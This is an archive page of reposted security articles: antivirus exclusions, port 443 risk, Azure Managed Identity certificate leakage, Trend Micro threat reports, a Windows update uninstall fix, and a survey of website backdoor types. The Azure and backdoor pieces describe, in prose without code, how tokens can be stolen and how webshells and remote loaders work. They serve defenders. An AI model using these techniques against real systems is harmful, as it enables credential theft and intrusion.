Trendmicro Archives - Page 10 of 15 - Appunti dalla rete

Which Altaro directories do I need to exclude from AntiVirus software?

If you are running an AntiVirus software or a file-scanning software, we do recommend excluding a couple of directories used by Altaro in order to ensure that it’s operation remains undisrupted.

We do recommend excluding the following:

all onsite backup drive directories
all offsite backup drive directories
C:\ProgramData\Altaro on the Altaro Management and on the Hyper-V hosts
C:\Program Files\Altaro on the Altaro Management and on the Hyper-V hosts

Also, if you relocated the Altaro temporary files ensure to exclude that directory as well.

Source :
https://help.altaro.com/hc/en-us/articles/4416905883409-Which

Securing Port 443: The Gateway To A New Universe

At Wordfence our business is to secure over 4 million WordPress websites and keep them secure. My background is in network operations, and then I transitioned into software development because my ops role was at a scale where I found myself writing a lot of code. This led me to founding startups, and ultimately into starting the cybersecurity business that is Wordfence. But I’ve maintained that ops perspective, and when I think about securing a network, I tend to think of ports.

You can find a rather exhaustive list of TCP and UDP ports on Wikipedia, but for the sake of this discussion let’s focus on a few of the most popular ports:

20 and 21 – FTP
22 – SSH
23 – (Just kidding. You better not be running Telnet)
25 – Email via SMTP
53 – DNS
80 – Unencrypted Web
110 – POP3 (for older email clients)
443 – Web encrypted via TLS
445 – Active Directory or SMB sharing
993 – IMAP (for email clients)
3306 – MySQL
6378 – Redis
11211 – Memcached

If you run your eye down this list, you’ll notice something interesting. The options available to you for services to run on most of these ports are quite limited. Some of them are specific to a single application, like Redis. Others, like SMTP, provide a limited number of applications, either proprietary or open-source. In both cases, you can change the configuration of the application, but it’s rare to write a custom application on one of those ports. Except port 443.

In the case of port 443 and port 80, you have a limited range of web servers listening on those ports, but users are writing a huge range of bespoke applications on port 443, and have a massive selection of applications that they can host on that port. Everything from WordPress to Drupal to Joomla, and more. There are huge lists of Content Management Systems.

Not only do you have a wide range of off-the-shelf web applications that you can run on port 443 or (if you’re silly) port 80, but you also have a range of languages they might be coded in, or in which you can code your own web application. Keep in mind that the web server, in this case, is much like an SSH or IMAP server in that it is listening on the port and handling connections, but the difference is that it is handing off execution to these languages, their various development frameworks, and ultimately the application that a developer has written to handle the incoming request.

With SSH, SMTP, FTP, IMAP, MySQL, Redis and most other services, the process listening on the port is the process that handles the request. With web ports, the process listening on the port delegates the incoming connection to another application, usually written in another language, running at the application layer, that is part of the extremely large and diverse ecosystem of web applications.

This concept in itself – that the applications listening on the web ports are extremely diverse and either home-made or selected from a large and diverse ecosystem – presents unique security challenges. In the case of, say, Redis, you might worry about running a secure version of Redis and making sure it is not misconfigured. In the case of a web server, you may have 50 application instances written in two languages from five different vendors all on the same port, which all need to be correctly configured, have their patch levels maintained, and be written using secure coding practices.

As if that doesn’t make the web ports challenging enough, they are also, for the most part, public. Putting aside internal websites for the moment, perhaps the majority of websites derive their value from making services available to users on the Internet by being public-facing. If you consider the list of ports I have above, or in the Wikipedia article I linked to, many of those ports are only open on internal networks or have access to them controlled if they are external. Web ports for public websites, by their very nature, must be publicly accessible for them to be useful. There are certain public services like SMTP or DNS, but as I mentioned above, the server that is listening on the port is the server handling the request in these cases.

A further challenge when securing websites is that often the monetary and data assets available to an attacker when compromising a website are greater than the assets they may gain compromising a corporate network. You see this with high volume e-commerce websites where a small business is processing a large number of web-based e-commerce transactions below $100. If the attacker compromises their corporate network via leaked AWS credentials, they may gain access to the company bank account and company intellectual property, encrypt the company’s data using ransomware, or perhaps even obtain customer PII. But by compromising the e-commerce website, they can gain access to credit card numbers in-flight, which are far more tradeable, and where the sum of available credit among all cards is greater than all the assets of the small business, including the amount of ransom that business might be able to pay.

Let’s not discount breaches like the 2017 Equifax breach that compromised 163 million American, British and Canadian citizen’s records. That was extremely valuable to the attackers. But targets like this are rare, and the Web presents a target-rich environment. Which is the third point I’d like to make in this post. While an organization may run a handful of services on other ports, many companies – with hosting providers in particular – run a large number of web applications. And an individual or company is far more likely to have a service running on a web port than any other port. Many of us have websites, but how many of us run our own DNS, SMTP, Redis, or another service listening on a port other than 80 or 443? Most of us who run websites also run MySQL on port 3306, but that port should not be publicly accessible if configured correctly.

That port 443 security is different has become clear to us at Wordfence over the years as we have tracked and cataloged a huge number of malware variants, web vulnerabilities, and a wide range of tactics, techniques, and procedures (TTP) that attackers targeting web applications use. Most of these have no relationship with the web server listening on port 443, and nearly all of them have a close relationship with the web application that the web server hands off control to once communication is established.

My hope with this post has been to catalyze a different way of thinking about port 443 and that other insecure port (80) we all hopefully don’t use. Port 443 is not just another service. It is, in fact, the gateway to a whole new universe of programming languages, dev frameworks, and web applications.

In the majority of cases, the gateway to that new universe is publicly accessible.

Once an attacker passes through that gateway, a useful way to think about the web applications hosted on the server is that each application is its own service that needs to have its patch level maintained, needs to be configured correctly, and should be removed if it is not in use to reduce the available attack surface.

If you are a web developer you may already think this way, and if anything, you may be guilty of neglecting services on ports other than port 80 or 443. If you are an operations engineer, or an analyst working in a SOC protecting an enterprise network, you may be guilty of thinking about port 443 as just another port you need to secure.

Think of port 443 as a gateway to a new universe that has no access control, with HTTPS providing easy standardized access, and with a wide range of diverse services running on the other side, that provide an attacker with a target and asset-rich environment.

—

Footnote: We will be exhibiting at Black Hat in Las Vegas this year at booth 2514 between the main entrance and Innovation City. Our entire team of over 30 people will be there. We’ll have awesome swag, as always. Come and say hi! Our team will also be attending DEF CON immediately after Black Hat.

Written by Mark Maunder – Founder and CEO of Wordfence.

Source :
https://www.wordfence.com/blog/2022/06/securing-port-443/

An Analysis of Azure Managed Identities Within Serverless Environments

We examine Azure’s Managed Identities service and its security capability in a threat model as developers’ go-to feature for managing secrets and credentials.

Authentication and authorization play crucial parts when securing resources. Authentication verifies that the service or user accessing the secured resources has provided valid credentials, while authorization makes sure that they have sufficient permissions for the request itself.

Broken Access Control is listed among the top 10 OWASP prevalent web application issues from 2017 to 2021, and we have previously written about the importance of secrets management used for authentication. This occurs when an unauthorized user can access, modify, delete, or perform actions within an application or system that is outside the set permissions or policies, malicious or unintended. Broken access control has become the number one concern in the organization’s list, and in this article, we discuss Azure’s Managed Identities service inside the cloud service provider (CSP) to tackle the said web application issue.

Managing system and user identities

Managed Identities for Azure allows users to authenticate certain services available within the CSP. This is done by providing the cloud application a token used for service authentication. We distinguish between two types of managed identities: system-assigned identities and user-assigned identities. To differentiate, system-assigned identities are restricted from one to the resource, which means that different user roles can’t be applied to the same resource. On the other hand, user-managed identities solve this problem and we can imagine them as user roles.

Figure 1. Usage of Managed Identities

For instance, we want to use an Azure storage account within a serverless application for saving our application records. For this purpose, we decided to use a system-managed identity.

This practically means:

Enable managed identities inside a serverless function
Grant serverless functions the necessary permissions for storage account access

Figure 2. Enabling managed identities in a serverless function

After that, we can start using the managed identity for authentication to the storage account. In the following sections, we will look at how the managed identities interface is technically implemented within the serverless environment and the corresponding security implications based on our recent research.

Managing identities in the serverless environment

To make it work, the serverless environment runs a special .NET application process named “dotnet TokenServiceContainer.dll.” This process listens on a localhost and port 8081 to accept HTTP requests. The endpoint for requesting a token is http://localhost:8081/msi/token, and the required parameters specifies that the API version used and resource identifier for which the service requests the token. Optionally, it uses “client_id,” which is a parameter used when a managed user identity token is requested. The request also needs a specific X-IDENTITY-HEADER, and the needed value is present inside IDENTITY_HEADER or an MSI_SECRET environmental variable.

After receiving this token request, the request is delegated to the endpoint within the CSP (another service) and provides the requested token. The endpoint is publicly available and is a part of the *.identity.azure.net subdomain based on the region of the serverless application. By design and public access to the endpoint the service requires authentication, and this is done using a X509 client certificate. This certificate is unique to the specific application ID (meaning the serverless function has a one-to-one pairing of certificate and app ID) and valid for 180 days. If the request is successful, it returns a JSON response with a bearer token valid for one day.

Figure 3. Managed identities inside serverless environments

From that perspective, the security standard is high, which is expected from a CSP service. However, there is one hidden danger and that is the certificate itself. The certificate can be leaked by leaking environmental variables.

The Managed Service Identity (MSI) certificate is part of the encrypted container context, which can be accessed inside using a URL-specified CONTAINER_START_CONTEXT_SAS_URI and decrypted using the CONTAINER_ENCRYPTION_KEY variable. Once the certificate is leaked, it can be used to obtain the token outside the scope of CSP services and successfully used for publicly available service endpoints as it would be called from the CSP service.

Threat model and scenario

Figure 4. PoC of getting token using leaked environmental variables from Managed Identity service

At this point, we should emphasize that to be able to abuse the retained token, a certain factor (or malicious actor) must first leak these environmental variables and there must be an assigned role within the requested resource, the pre-requisites being the identities enabled and the role set for the application. This means there are no default roles unless explicitly specified within the CSP settings.

However, as this example of potential compromise shows from a gap leaking environmental variables of a Linux endpoint, using environmental variables for storing sensitive information is not a valid secure approach as they are by default inherited into the child process. Considering that the information is available inside the environment itself and that the certificate contains all the information provided, the endpoint for getting the token now becomes publicly available. A threat actor can get the authentication token outside of the CSP’s service and get all the permissions as the original user.

In this example, the token provider service within the serverless environment is running under a different user. Why is the client certificate available not only for this user in the form of a file with permissions only for that user? This allows a compromised serverless function to leak it and obtain the access token from the external service. But while the unauthorized user can’t get additional privileges other than what the function has, this is enough to conduct activities inside the environment that can have a range of damaging effects. By moving a client certificate into the security boundary of token service user and setting access permissions for the token service user as read-only, we guarantee that even in case of a compromise, the client certificate could not be leaked and used outside the CSP service without additional lateral movement.

The security chain is only as strong as its weakest parts. And while CSP services are not inherently insecure, small design weaknesses put together with improper user configurations could lead to bigger, more damaging consequences. Design applications, environments, and all their related variables with security in mind. If possible, avoid using environmental variables. Following best security practices such as applying the principle of least privilege helps to mitigate the consequences of a breach.

Source :
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/an-analysis-of-azure-managed-identities-within-serverless-environments

Trend Micro Cloud App Security Threat Report 2021

In this report, we highlight the notable email threats of 2021, including over 33.6 million high-risk email threats (representing a 101% increase from 2020’s numbers) that we’ve detected using the Trend Micro Cloud App Security platform.

Email is an integral cog in the digital transformation machine. This was especially true in 2021, when organizations found themselves trying to keep business operations afloat in the middle of a pandemic that has forever changed how people work. At a time when the workplace had already largely shifted from offices to homes, malicious actors continued to favor email as a low-effort yet high-impact attack vector to disseminate malware.

Email is not only popular among cybercriminals for its simplicity but also for its efficacy. In fact, 74.1% of the total threats blocked by Trend Micro in 2021 are email threats. Meanwhile, the 2021 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3) states that there was “an unprecedented increase in cyberattacks and malicious cyber activity” last year, with business email compromise (BEC) being among the top incidents.

In this report, we discuss the notable email threats of 2021 based on the data that we’ve gathered using the Trend Micro™ Cloud App Security™, a security solution that supplements the preexisting security features in email and collaboration platforms.

Download our infographic

Malware detections surge as attacks become more elaborate, targeted

The Trend Micro Cloud App Security solution detected and thwarted a total of 3,315,539 total malware files in 2021. More urgently, this number represents an increase of a whopping 196% from 2020’s numbers. There were also huge spikes in both known and unknown malware detections in 2021 at 133.8% and 221%, respectively.

Cybercriminals worked overtime to attach malware in malicious emails in 2021 using advanced tactics and social engineering lures. In January, we saw how Emotet sent spam emails that used hexadecimal and octal representations of IP addresses for detection evasion in its delivery of malware such as TrickBot and Cobalt Strike.

In May last year, we reported on Panda Stealer, an information stealer that targets cryptocurrency wallets and credentials via spam emails. We also shared an update on APT-C-36 (aka Blind Eagle), an advanced persistent threat (APT) group targeting South American entities using a spam campaign that used fraudulent emails impersonating Colombia’s national directorate of taxes and customs and even fake infidelity email lures.

QAKBOT operators also resumed their spam campaign in late 2021 after an almost three-month hiatus and abused hijacked email threads to lead victims to both QAKBOT and the SquirrelWaffle malware loader.

Meanwhile, ransomware detections continued to decline in 2021, a consistent trend that we have been seeing in previous years. Last year, the Trend Micro Cloud App Security solution detected and blocked 101,215 ransomware files — a 43.4% decrease compared to 2020’s detections.

The reason behind this continuing decline is possibly two-fold: One, unlike legacy ransomware that focuses on the quantity of victims, modern ransomware focuses on waging highly targeted and planned attacks to yield bigger profits. Since today’s ransomware actors no longer abide by the spray-and-pray ransomware model, the number of attacks are no longer as massive as the number that we witnessed in ransomware’s early days. We identified the other reason in our year-end roundup report: That is, it’s possible that ransomware detections are down because our cybersecurity solutions continue to block an increasing number of ransomware affiliate tools each year, including TrickBot and BazarLoader. This could have prevented ransomware attacks from being successfully executed on victim environments.

Known, unknown, and overall credential phishing attacks rose in 2021

Based on Trend Micro Cloud App Security data, 6,299,883 credential phishing attacks were detected and blocked in 2021, which accounts for a 15.2% overall increase. Similar to last year, the number of known credential phishing attacks is greater than the unknown ones. However, this year, the percentage of increase is at a staggering 72.8%.

When comparing 2020 and 2021’s numbers, we saw an 8.4% increase in the number of detections for known credential phishing links, while a 30% growth is observed in the number of detections for unknown credential phishing links.

Abnormal Security noted the increase in overall credential phishing attacks in one 2021 report and stated that credential phishing is attributed to 73% of all advanced threats that they’ve analyzed.

We have also documented the rise in credential phishing attacks from previous years. In fact, in the first half of 2019, the Trend Micro Cloud App Security solution detected and blocked 2.4 million credential phishing attacks alone.

BEC’s small numbers bring big business losses

The Trend Micro Cloud App Security solution intercepted a total of 283,859 BEC attacks in 2021. Compared with 2020’s BEC detections, this number represents a 10.61% decrease. Interestingly, there is an 82.7% increase in this year’s BEC attacks that were detected using Writing Style DNA, while there is a 38.59% decrease in attacks that have been blocked using the antispam engine.

Overall, BEC numbers have consistently been on a downward trend since 2020. But the reduction in BEC victims doesn’t equate to a dip in cybercriminal profits. According to the FBI’s IC3, BEC accounted for US$2.4 billion in adjusted losses for both businesses and consumers in 2021. According to the same organization, BEC losses have reached over US$43 billion between June 2016 and December 2021 for both domestic and international incidents.

We have also observed how BEC actors continuously tweak their tactics for ill gain. In August last year, our telemetry showed a gradual increase in BEC detections. Upon investigation, we discovered that instead of impersonating company executives and upper management personnel, this BEC-related email campaign impersonated and targeted ordinary employees for money transfers and bank payroll account changes.

Covid-19 lures, cybercriminal campaigns behind massive jump in phishing numbers

The Trend Micro Cloud App Security solution data shows that a total of 16,451,166 phishing attacks were detected and blocked in 2021. This is a 137.6% growth from 2020’s phishing numbers.

In contrast to last year’s numbers, we saw a significant jump in phishing attacks detected via spam count this year — a whopping 596% increase, to be specific. Meanwhile, we observed a notable 15.26% increase in credential phishing count compared to last year.

These high numbers reflect organizations’ sentiments about phishing attacks. According to a survey in an Osterman Research report titled “How to Reduce the Risk of Phishing and Ransomware,” organizations were “concerned” or “extremely concerned” about phishing attempts making their way to end users and employees failing to spot phishing and social engineering attacks before accessing a link or attachment.

While they kicked off majority of Covid-19-related phishing emails and sites in 2020, cybercriminals still exploited the global pandemic for financial gain. Last year, Mexico-based medical laboratory El Chopo shared that a fraudulent website that looked identical to the company’s had been launched. On that website, users could schedule a vaccination appointment after paying MXN2,700 (approximately US$130). To make the fake website appear credible, the malicious actors behind it added fake contact information such as email addresses and social media pages that victims can use for inquiries.

Early last year, we reported on a wave of phishing emails that pretended to be coming from national postal systems. This campaign attempted to steal credit card numbers from 26 countries. We also investigated a spear-phishing campaign that used Pegasus spyware-related emails to lead victims into downloading a file stealer. This campaign targeted high-ranking political leaders, activists, and journalists in 11 countries.

Protect emails, endpoints, and cloud-based services and apps from attacks with Trend Micro Cloud App Security

Organizations should consider a comprehensive multilayered security solution such as Trend Micro Cloud App Security. It supplements the preexisting security features in email and collaboration platforms like Microsoft 365 and Google Workspace (formerly known as G Suite) by using machine learning (ML) to analyze and detect any suspicious content in the message body and attachments of an email. It also acts as a second layer of protection after emails and files have passed through Microsoft 365 or Gmail’s built-in security.

Trend Micro Cloud App Security uses technologies such as sandbox malware analysis, document exploit detection, and file, email, and web reputation technologies to detect malware hidden in Microsoft 365 or PDF documents. It provides data loss prevention (DLP) and advanced malware protection for Box, Dropbox, Google Drive, SharePoint Online, OneDrive for Business, and Salesforce while also enabling consistent DLP policies across multiple cloud-based applications. It also offers seamless integration with an organization’s existing cloud setup, preserving full user and administrator functionality, providing direct cloud-to-cloud integration through vendor APIs, and minimizing the need for additional resources by assessing threat risks before sandbox malware analysis.

Trend Micro Cloud App Security stands on the cutting edge of email and software-as-a-service (SaaS) security, offering ML-powered features that combat two of the primary email-based threats: BEC and credential phishing. Writing Style DNA can help determine if an email is legitimate by using ML to check a user’s writing style based on past emails and then comparing suspicious emails against it. Computer vision, on the other hand, combines image analysis and ML to check branded elements, login forms, and other site content. It then pools this information with site reputation elements and optical character recognition (OCR) to check for fake and malicious sites — all while reducing instances of false positives to detect credential phishing email.

This security solution also comes with an option to rescan historical URLs in users’ email metadata and perform continued remediation (automatically taking configured actions or restoring quarantined messages) using newer patterns updated by Web Reputation Services.

This is a significant option since users’ email metadata might include undetected suspicious or dangerous URLs that have only recently been discovered. The examination of such metadata is thus an important part of forensic investigations that help determine if your email service has been affected by attacks. This solution also officially supports the Time-of-Click Protection feature to protect Exchange Online users against potential risks when they access URLs in incoming email messages.

Trend Micro Cloud App Security also comes with the advanced and extended security capabilities of Trend Micro XDR, providing investigation, detection, and response across your endpoints, email, and servers.

Source :
https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trend-micro-cloud-app-security-threat-report-2021

Trend Micro’s One Vision, One Platform

The world moves fast sometimes. Just two years ago, organizations were talking vaguely about the need to transform digitally, and ransomware began to make headlines outside the IT media circle. Fast forward to 2022, and threat actors have held oil pipelines and critical food supply chains hostage, while many organizations have passed a digital tipping point that will leave them forever changed. Against this backdrop, CISOs are increasingly aware of running disjointed point products’ cost, operational, and risk implications.

That’s why Trend Micro is transforming from a product- to a platform-centric company. From the endpoint to the cloud, we’re focused on helping our customers prepare for, withstand, and rapidly recover from threats—freeing them to go further and do more. Analysts seem to agree.

Unprecedented change

The digital transformation that organizations underwent during the pandemic was, in some cases, unprecedented. It helped them adapt to a new reality of remote and now hybrid working, supply chain disruption, and rising customer expectations. The challenge is that these investments in cloud infrastructure and services are broadening the corporate attack surface. In many cases, in-house teams are drowning in new attack techniques and cloud provider features. This can lead to misconfigurations which open the door to hackers.

Yet even without human error, there’s plenty for the bad guys to target in modern IT environments—from unpatched vulnerabilities to accounts protected with easy-to-guess or previously breached passwords. That means threat prevention isn’t always possible. Instead, organizations are increasingly looking to augment these capabilities with detection and response tooling like XDR to ensure incidents don’t turn into large-scale breaches. It’s important that these tools are able to prioritize alerts. Trend Micro found that as many as 70% of security operations (SecOps) teams are emotionally overwhelmed with the sheer volume of alerts they’re forced to deal with.

SecOps staff and their colleagues across the IT function are stretched to the limit by these trends, which are compounded by industry skills shortages. The last thing they need is to have to swivel-chair between multiple products to find the right information.

What Gartner says

Analyst firm Gartner is observing the same broad industry trends. In a recent report, it claimed that:

Vendors are increasingly divided into “platform” and “portfolio” providers—the latter providing products with little underlying integration
By 2025, 70% of organizations will reduce to a maximum of three the number of vendors they use to secure cloud-native applications
By 2027, half of the mid-market security buyers will use XDR to help consolidate security technologies such as endpoint, cloud, and identity
Vendors are increasingly integrating diverse security capabilities into a single platform. Those which minimize the number of consoles and configuration planes, and reuse components and information, will generate the biggest benefits

The power of one

This is music to our ears. It is why Trend Micro introduces a unified cybersecurity platform, delivering protection across the endpoint, network, email, IoT, and cloud, all tied together with threat detection and response from our Vision One platform. These capabilities will help customers optimize protection, detection, and response, leveraging automation across the key layers of their IT environment in a way that leaves no coverage gaps for the bad guys to hide in.

There are fewer overheads and hands-on decisions for stretched security teams with fewer vendors to manage, a high degree of automation, and better alert prioritization. Trend Micro’s unified cybersecurity platform vision also includes Trend Micro Service One for 24/7/365 managed detection, response, and support—to augment in-house skills and let teams focus on higher-value tasks.

According to Gartner, the growth in market demand for platform-based offerings has led some vendors to bundle products as a portfolio despite no underlying synergy. This can be a “worst of all worlds,” as products are neither best-of-breed nor do they reduce complexity and overheads, it claims.

We agree. That’s why Trend Micro offers a fundamentally more coherent platform approach. We help organizations continuously discover an ever-changing attack surface, assess risks and then take streamlined steps to mitigate that risk—applying the right security at the right time. That’s one vision, one platform, and total protection.

To find out more about Trend Micro One, please visit: https://www.trendmicro.com/platform-one

Source :
https://www.trendmicro.com/en_us/research/22/e/platform-centric-enterprise-cybersecurity-protection.html

Windows 11 KB5014019 breaks Trend Micro ransomware protection

This week’s Windows optional cumulative update previews have introduced a compatibility issue with some of Trend Micro’s security products that breaks some of their capabilities, including the ransomware protection feature.

“The UMH component used by several Trend Micro endpoint and server protection products is responsible for some advanced features such as ransomware protection,” the antivirus vendor revealed.

“Trend Micro is aware of an potential issue where customers who apply the optional Microsoft Windows 11 or Windows 2022 optional preview patches (KB5014019) and reboot would then find that the Trend Micro UMH driver would stop.”

The known issue affects the User Mode Hooking (UMH) component used by several Trend Micro endpoint solutions, including Apex One 2019, Worry-Free Business Security Advanced 10.0, Apex One as a Service 2019, Deep Security 20.0, Deep Security 12.0, and Worry-Free Business Security Services 6.7.

The Japanese cybersecurity company is now working on a fix to address this issue before the update previews are pushed to all Windows customers as part of the June 2022 Patch Tuesday.

How to restore Trend Micro endpoint solution capabilities

Luckily, unlike regular Patch Tuesday Windows updates, this week’s preview updates are optional and they were issued to test bug fixes and performance improvements before the general release.

Windows users have to manually check for them from Settings > Windows Update. They will not be installed until you click the ‘Download now’ button, limiting the number of potentially impacted users.

Impacted Windows platforms include both client and server versions with the problems experienced on systems running Windows 11, Windows 10 version 1809, and Windows Server 2022.

Trend Micro customers who have installed the optional Windows optional patch may either uninstall the patch temporarily or reach out to support to get a UMH debug module that should revive their security solution’s capabilities.

Windows users can remove the preview updates using the following commands from an Elevated Command Prompt.

Windows 10 1809: wusa /uninstall /kb:5014022 
Windows 11: wusa /uninstall /kb:5014019
Windows Server 2022: wusa /uninstall /kb:5014021

Source :
https://www.bleepingcomputer.com/news/security/windows-11-kb5014019-breaks-trend-micro-ransomware-protection/

Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report

The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. Trend Micro detected and blocked more than 94 billion threats over the course of last year, keeping pace with malicious actors who were intent on abusing any weak spots in the security postures of organizations around the world. In our annual cybersecurity report, “Navigating New Frontiers,” we look back at 2021 in terms of the most significant security issues and trends that shaped the year’s threat landscape.

Ransomware actors become more deliberate in targeting critical industries

From years of tracking ransomware activities, we have observed how ransomware operators have evolved from deploying quantity-based tactics to deliberately picking more profitable victims. Modern ransomware usually dedicates more time and effort to planning and reconnaissance, making for debilitating attacks that are tailored to the specific systems of targets.

Likely because of the important roles they had played amid the pandemic, organizations in the government, banking, and healthcare industries bore the brunt of ransomware attacks in 2021, although we observed a 21% year-on-year decrease in overall ransomware detections. But this decline does not necessarily mean that there were fewer ransomware attacks. Rather, it could be the result of our detection and blocking of more malware tools that were often used by ransomware actors, including the Cobalt Strike beacon CoBeacon, the trojan Trickbot, and the information stealer BazarLoader. That we blocked larger numbers of these affiliate tools, whose presence is an early indicator of infection, might have prevented ransomware actors from escalating their operations to full-scale attacks.

Figure 1. The top three industries in terms of ransomware file detections in 2020 and 2021

Source: Trend Micro™ Smart Protection Network™

Malicious actors zero in on misconfigurations in cloud environments

More companies turned to the cloud to continue and expand their businesses, but the inherent complexity of setting up cloud infrastructures drove malicious actors to move quickly and take advantage of misconfigurations in these environments. Notably, a role-based access control misconfiguration in Kubernetes enabled the threat actor group TeamTNT to compromise almost 50,000 IP addresses in the US and China as part of a large-scale credential theft campaign last year. Also in 2021, TeamTNT used misconfigured servers as an attack vector to pilfer metadata from cloud service providers.

Figure 2. TeamTNT’s attack chain

Email-based attacks evolve into a more complex threat

In 2021, Trend Micro Cloud App Security found and blocked more than 25 million email threats. Phishing attempts, in particular, nearly doubled from 2020’s number. Of these, 62% were from spam emails while the rest consisted of credential-phishing attempts. Organizations in finance, healthcare, and education experienced the bulk of phishing attempts.

Figure 3. A comparison of the detections of spam phishing and credential-phishing attempts in 2020 and 2021

Source: Trend Micro Cloud App Security

We observed a dip in attempts at business email compromise (BEC) in 2021, but this could be because of an increase in more sophisticated BEC emails that were capable of avoiding antispam rules. We were able to stay on top of this development, however, as Trend Micro Cloud App Security used authorship analysis to detect and block a greater proportion as well as a greater number of these BEC attempts in 2021 than in 2020.

Figure 4. A comparison of the proportions of BEC attempts blocked based on authorship analysis and BEC attempts blocked based on behavior and intention analysis in 2020 and 2021

Source: Trend Micro Cloud App Security

Email was also the preferred entry point of opportunistic actors looking to exploit developments in the ongoing pandemic. We detected over 8 million Covid-19-related threats throughout 2021, mostly in the US and Germany. The majority of these threats were made up of emails, which is consistent with the upward trend of phishing attempts levied against the vaccine cold chain. The consistent news coverage surrounding the health crisis likely supplied malicious actors with new themes for their email lures.

Figure 5. A comparison of the detections of Covid-19-related threats consisting of malicious emails, URLs, and files in 2020 and 2021

Source: Trend Micro Cloud App Security

Exploits of vulnerabilities both old and new run rampant

In 2021, Trend Micro™ Zero Day Initiative™ (ZDI) published advisories for 1,604 vulnerabilities, a 10% increase from the previous year. Alongside newly found ones, however, malicious actors continued to exploit previously disclosed flaws in their attacks. They carried on with abusing legacy vulnerabilities despite the availability of patches addressing these flaws, and a demand for these persisted in the cybercriminal underground, where almost 25% of vulnerabilities sold were at least three years old.

Figure 6. A comparison of the proportions of Common Vulnerability Scoring System (CVSS) ratings among vulnerabilities disclosed by Trend Micro’s ZDI program in 2020 and 2021

Source: Trend Micro™ Zero Day Initiative™

Unpatched systems remained a liability for organizations, as evidenced by Log4Shell (CVE-2021-44228), a high-severity vulnerability in Apache Log4j that was first reported privately to Apache in November 2021. A patch for it was made available a month later, but that did not stop malicious actors from exploiting it in various ransomware, data theft, and cryptocurrency-mining attacks.

Similarly, even though patches for them had been released, the Microsoft Exchange Server vulnerabilities ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-34473 and CVE-2021-34523) were still successfully exploited by malicious actors. The cybercriminals behind the Squirrelwaffle loader, for example, used ProxyLogon and ProxyShell in hijacking their victims’ email accounts.

Enterprises need multilayered defense to keep thorny threats at bay

As their attack surfaces expand or otherwise evolve, enterprises across the globe are compelled to explore unfamiliar security terrain, where they will need high-quality data from a unified view of their entire digital ecosystems to anticipate, assess, and mitigate risks. Read our annual cybersecurity report, “Navigating New Frontiers,” to learn more about the noteworthy security stories of 2021 and obtain valuable insights that can help enterprises fend off latent, emergent, and current threats.

Source :
https://www.trendmicro.com/en_us/research/22/c/attacks-abound-in-tricky-threat-terrain–2021-annual-cybersecuri.html

Examining Emerging Backdoors

Next up in our “This didn’t quite make it into the 2021 Threat Report, but is still really cool” series: New backdoors!

Backdoors are a crucial component of a website infection. They allow the attackers ongoing access to the compromised environment and provide them a “foot in the door” to execute their payload. We see many different types of backdoors with varying functionality.

When our malware research team is provided with a new backdoor they need to write what’s called a “signature” to ensure that we detect and remove it in future security scans. Signatures need names, and over the years we’ve developed something of a taxonomy naming system for all of the different malware that we come across.

In this article we’re going to explore all the different categories of signatures for newly-discovered backdoors throughout the year 2021.

How do Backdoors Work?

HTTP requests to websites typically fall into one of the following categories:

POST – sending data to a website
GET – requesting data from a website
COOKIE – data (such as session data) saved from a website
REQUEST – a conjunction of all/any of the three

We see all sorts of different backdoors while cleaning up compromised websites. Sometimes they use one of these types of requests, or a combination of multiple different types.

We’ve broken all newly generated signatures from 2021 down for further analysis into the following categories:

A graph showing the distribution of new backdoor signatures generated in 2021.

Uploaders

By far the most common type of backdoor found in 2021 was an uploader: That is, a PHP script that allows the attackers to upload any file that they want. These malicious files allow anyone with the correct URL path, parameters and (occasionally) access credentials to upload whichever files they want to the web server. Typically, bad actors use these backdoors to upload a webshell, spam directory, dropper, or other type of file giving them full control over the environment.

To avoid detection, attackers are always tweaking their malware by using new methods of obfuscation or concealing backdoors within legitimate-looking images, core files, plugins, or even themes — this can make malicious file uploaders difficult to detect during a casual site review.

Once an attacker has identified a vulnerable environment that they can get a foothold in, planting the uploader is often the next step. After that they have enough access to upload more complicated access points such as a webshell.

Of course there are legitimate uploader scripts, as many websites require functionality to allow users to upload photos or other content to the website. To mitigate risk, secure uploader scripts contain strict rules on how they are able to behave:

Only certain file types/extensions are allowed (usually image, or document files)
May require authorisation cookies to be set
May place files in a restricted directory with PHP execution disabled
May disable direct access and instead need to be called by the existing CMS structure

Malicious uploaders, on the other hand, have no such restrictions as they are designed to upload malicious files and PHP scripts.

WebShells

Webshells are a classic type of malware that have been used by attackers for many years. They are administrative dashboards that give the attacker full access to the files and often provide a large amount of information about the hosting environment including operating system, PHP settings, web server configurations, file management, and SQL connections.

The classic FilesMan shell continues to be very popular with attackers. In 2021 we generated 20 new signatures related to new filesman variants alone, not including hack tools which grab filesman shells from remote servers.

Interestingly, a lot of malicious web shells provide far superior functionality than a lot of file managers provided by web hosting providers.

Misc RCE

Sometimes remote code execution backdoors are a little more complicated, or just rely on more basic/generic $_REQUEST calls. This is a PHP global array that contains the content of GET, POST and COOKIE inputs. The content of these variables could be anything and the attacker can fill them — e.g. with the payload — which is then processed. Sometimes the entire payload code is stored there and only very simple code snippets are injected into legitimate files. Such a snippet only loads and executes the content of these variables.

Other times, RCE backdoors make use of multiple different functions and request types.

Generic

Not falling into any particular category are our collection of “generic” backdoors. They tend to use a mixture of different functions and methods to maintain backdoor access to the environment. Some are heavily obfuscated and others are mostly in plain text, but what unites them is that they don’t rely on any one technique to backdoor the environment in which they reside.

FILE_GET_CONTENTS

The PHP function file_get_contents fetches a local file or remote file. As far as backdoors are concerned, attackers misuse this function to grab malicious files located on other websites or servers and add it to the victim’s website. This allows them to host the actual malicious content elsewhere, while maintaining all of the same functionality on the victim environment.

Here we have a very simple backdoor using file_get_contents to grab a backdoor from a malicious server. The actual address is obfuscated through use of a URL shortening service:

The footprint of this malware is very small as the payload resides elsewhere, but the functionality is potentially huge.

Remote Code Execution Backdoors

Not to be confused with remote code execution vulnerabilities, these backdoors are crafted to take whatever command is issued to it by the attacker and execute it in the victim’s environment. These PHP backdoors are often more complex than uploaders and allow the attackers more leeway in terms of how they can interact with the victim website.

If a request is sent that matches the parameters of the backdoor it will execute whichever command the attacker instructs so long as it doesn’t get blocked by any security software or firewall running within the environment.

